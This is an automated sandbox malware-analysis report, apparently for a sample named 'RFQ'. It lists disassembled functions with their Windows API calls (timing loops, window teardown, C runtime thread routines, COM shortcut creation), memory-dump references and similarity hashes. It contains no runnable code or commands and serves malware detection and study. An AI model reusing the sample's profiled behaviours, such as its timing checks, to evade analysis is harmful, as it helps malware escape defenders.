                                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                          Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CounterPerformanceQuerySleep
                                                                          • String ID:
                                                                          • API String ID: 2875609808-0
                                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                          Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                          Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                          • String ID:
                                                                          • API String ID: 4023252218-0
                                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                          Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                          • String ID:
                                                                          • API String ID: 1489400265-0
                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                          Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1042038666-0
                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                          Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                          Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __getptd.LIBCMT ref: 00417826
                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                          • __lock.LIBCMT ref: 00417844
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                          • String ID:
                                                                          • API String ID: 938513278-0
                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                          Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 2403457894-0
                                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                          Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 4247068974-0
                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                          Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )$U$\
                                                                          • API String ID: 0-3705770531
                                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                          Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                          • String ID: .lnk
                                                                          • API String ID: 886957087-24824748
                                                                          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                          Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                          • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                          • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                          • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                          Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                          • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                          • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                          • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                          Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: \
                                                                          • API String ID: 4104443479-2967466578
                                                                          • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                          • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                          • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                          • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                          Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                          Download Yara Rule
                                                                          Strings
